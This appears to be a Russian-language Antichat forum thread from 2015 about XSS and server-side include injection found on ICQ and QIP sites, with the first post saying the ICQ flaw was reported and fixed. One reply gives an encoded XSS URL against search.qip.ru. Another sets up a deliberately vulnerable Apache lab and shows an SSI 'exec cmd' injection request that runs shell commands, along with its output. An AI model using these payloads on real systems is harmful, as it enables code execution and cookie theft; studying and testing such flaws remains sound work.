HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Skype, IRC, ICQ, Jabber и другие IM
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 24.05.2015, 14:57
alkos
Участник форума
Регистрация: 28.03.2007
Сообщений: 252
С нами: 10063867

Репутация: 63
По умолчанию

Не так давно на сервере people.icq.com изменили форму отображения инфо о уине. Пример:



Самая первая мысль, а что если в поле people.icq.com/people// ввести что-то другое?

Попробует выполнить скрипт [B] XSS работает, значит можно воровать кукисы :




А может кто-то по ошибке забыл отключить Server Side Include (SSI)? Сервер пашет на nginx. На удачу составим запрос с отображением локального времени :



Опачки! Работает!

А адрес сервера покажет?




А путь к корню?



Так может и шелл можно залить " --> ???...

А это уже совсем другая история....

P.S. На момент написания статьи администрация ICQ уже была оповещена о данной уязвимости и залатала дырку.

(с) alkos
 
Ответить с цитированием

  #2  
Старый 24.05.2015, 15:22
alkos
Участник форума
Регистрация: 28.03.2007
Сообщений: 252
С нами: 10063867

Репутация: 63
По умолчанию

Цитата:
Сообщение от Expl0ited  

шелл то хоть залил?
 
Ответить с цитированием

  #3  
Старый 24.05.2015, 15:25
waik
Участник форума
Регистрация: 02.11.2008
Сообщений: 222
С нами: 9222794

Репутация: 155
По умолчанию

Читал пост ТС и все боялся что он подробно расскажет всем как залить шелл)

Обошлось.
 
Ответить с цитированием

  #4  
Старый 26.05.2015, 13:55
qwertov
Новичок
Регистрация: 23.05.2015
Сообщений: 17
С нами: 5776886

Репутация: 0
По умолчанию

Зла не хватает. Кто то адаптируется, а кто то взламывает.
 
Ответить с цитированием

  #5  
Старый 26.05.2015, 23:50
kingbeef
Новичок
Регистрация: 08.04.2010
Сообщений: 1
С нами: 8469890

Репутация: 0
По умолчанию

Ну и в продолжении...

Код:
http://search.qip.ru/search/?query=\x3C\x2Fscript\x3E\x3Cscript\x3Ealert\x28document.domain\x29\x3C\x2Fscript\x3E


http://search.qip.ru/search/?query=\...OOT\x22+--\x3E

90 строка

 
Ответить с цитированием

  #6  
Старый 27.05.2015, 00:13
psihoz26
Постоянный
Регистрация: 22.11.2010
Сообщений: 545
С нами: 8142806

Репутация: 324


По умолчанию

Алкос подари 31338))
 
Ответить с цитированием

  #7  
Старый 27.05.2015, 00:31
alkos
Участник форума
Регистрация: 28.03.2007
Сообщений: 252
С нами: 10063867

Репутация: 63
По умолчанию

Цитата:
Сообщение от psihoz26  

Алкос подари 31338))
это номер [ e l i T e ] вообще-то, у него спрашивай
 
Ответить с цитированием

  #8  
Старый 27.05.2015, 12:26
psihoz26
Постоянный
Регистрация: 22.11.2010
Сообщений: 545
С нами: 8142806

Репутация: 324


По умолчанию

странно я думал это анрег.
 
Ответить с цитированием

  #9  
Старый 27.05.2015, 13:00
alkos
Участник форума
Регистрация: 28.03.2007
Сообщений: 252
С нами: 10063867

Репутация: 63
По умолчанию

31338 » 0x05 — REGISTRED…

31338 » 11.01.2013 07:01:33
 
Ответить с цитированием

  #10  
Старый 28.05.2015, 05:58
Strilo4ka
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
С нами: 9000386

Репутация: 1148
По умолчанию

Предполагаю, что такие вещи актуальны не только для XSS, но и SQL inj, когда результат запроса выводится на страницу, тоесть может быть нечто подобноеSQL inj -> XXS(SIXSS) -> SSI. Только стоит сказать один важный момент, сам nginx хоть и имеет потдержку SSI, но он не умееет запускать внешнюю программу, в отличии от Apache(нагуглил gemaglabin). В Apache SSI реализован через модульmod_include, но для работыexec cmd еще нужно mod_cgi или mod_cgid, а также отключенная директива IncludesNoExec, иначе в контенте на html страничке будет [an error occurred while processing this directive] и в лог ошибок(если включен) будет падать запись:AH01371: unknown directive "exec" in parsed doc.

Код:
sudo mkdir -p /srv/www/vuln_dev/public_html
sudo mkdir /srv/www/vuln_dev/logs
sudo chown $USER: -R  /srv/www/vuln_dev/public_html
sudo nano /etc/apache2/sites-available/vuln-dev.conf

  ServerAdmin vuln@locahost
  ServerName vuln
  DocumentRoot /srv/www/vuln_dev/public_html

  
  AllowOverride All
  Require all granted
  
  ErrorLog /srv/www/vuln_dev/logs/error.log
  LogLevel warn

sudo a2ensite vuln-dev.conf
sudo nano /etc/hosts
127.0.0.1 vuln
sudo nano /etc/apache2/mods-available/userdir.conf
#IncludesNoExec
sudo a2enmod include
sudo a2enmod cgi
sudo service apache2 restart
nano /srv/www/vuln_dev/public_html/.htaсcess

Код:
Options Includes
AddType application/x-httpd-php .html
AddOutputFilter INCLUDES .html
nano /srv/www/vuln_dev/public_html/index.html

Код HTML:
  Тест
  

   
Запрос

Код:
 это %3C!--%23exec%20cmd%3D%22ls%22%20--%3E
http://vuln/?t=%3C!--%23exec%20cmd%3D%22ls%20-la%22%20--%3E
Ответ

Код HTML:
  Тест
  

   total 16
drwxr-xr-x 2 omen666 omen666 4096 May 28 04:26 .
drwxr-xr-x 4 root  root  4096 May 28 01:01 ..
-rw-r--r-- 1 omen666 omen666  87 May 28 04:26 .htaccess
-rw-r--r-- 1 omen666 omen666  138 May 28 03:53 index.html
ps все пошла школота хекать )
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.